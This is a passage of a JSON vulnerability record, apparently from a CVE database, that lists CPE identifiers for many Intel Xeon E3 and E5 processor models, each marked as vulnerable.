                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1286l_v3:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1290:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1290_v2:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1501l_v6:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1501m_v6:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1505l_v5:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1505l_v6:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1505m_v5:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2650l_v4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2658:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2658_v2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2658_v3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2658_v4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2658a_v3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2660:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2660_v2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2660_v3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2660_v4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2665:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2667:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2667_v2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2667_v3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2667_v4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2670:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2670_v2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2670_v3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2680:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2680_v2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2680_v3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2680_v4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2683_v3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2683_v4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2687w:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2687w_v2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2687w_v3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2687w_v4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2690:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2690_v2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2690_v3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2690_v4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2695_v2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2695_v3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2695_v4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2697_v2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2697_v3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2697_v4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2697a_v4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2698_v3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2698_v4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2699_v3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2699_v4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2699a_v4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2699r_v4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4603:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4603_v2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4607:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4607_v2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4610:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4610_v2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4610_v3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4610_v4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4617:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4620:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4620_v2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4620_v3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4620_v4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4624l_v2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4627_v2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4627_v3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4627_v4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4628l_v4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4640:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4640_v2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4640_v3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4640_v4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4648_v3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4650:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4650_v2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4650_v3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4650_v4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4650l:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4655_v3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4655_v4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4657l_v2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4660_v3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4660_v4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4667_v3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4667_v4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4669_v3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4669_v4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_1428l:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_1428l_v2:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_1428l_v3:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_1620:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_1620_v2:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_1620_v3:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_1620_v4:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_1630_v3:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_1630_v4:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_1650:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_1650_v2:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_1650_v3:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_1650_v4:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_1660:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_1660_v2:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_1660_v3:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_1660_v4:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_1680_v3:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_1680_v4:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2403:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2403_v2:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2407:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2407_v2:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2408l_v3:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2418l:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2418l_v2:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2418l_v3:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2420:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2420_v2:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2428l:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2428l_v2:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2428l_v3:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2430:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2430_v2:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2430l:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2430l_v2:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2438l_v3:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2440:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2440_v2:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2448l:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2448l_v2:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2450:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2450_v2:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2450l:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2450l_v2:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2470:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2470_v2:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2603:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2603_v2:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2603_v3:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2603_v4:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2608l_v3:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2608l_v4:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2609:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2609_v2:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2609_v3:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2609_v4:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2618l_v2:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2618l_v3:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2618l_v4:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2620:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2620_v2:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2620_v3:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2620_v4:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2623_v3:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2623_v4:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2628l_v2:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2628l_v3:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2628l_v4:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2630:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2630_v2:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2630_v3:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2630_v4:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2630l:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2630l_v2:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2630l_v3:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2630l_v4:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2637:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2637_v2:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2637_v3:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2637_v4:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2640:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2640_v2:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2640_v3:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2640_v4:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2643:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2643_v2:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2643_v3:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2643_v4:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2648l:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2648l_v2:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2648l_v3:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2648l_v4:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2650:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2650_v2:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2650_v3:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2650_v4:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2650l:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
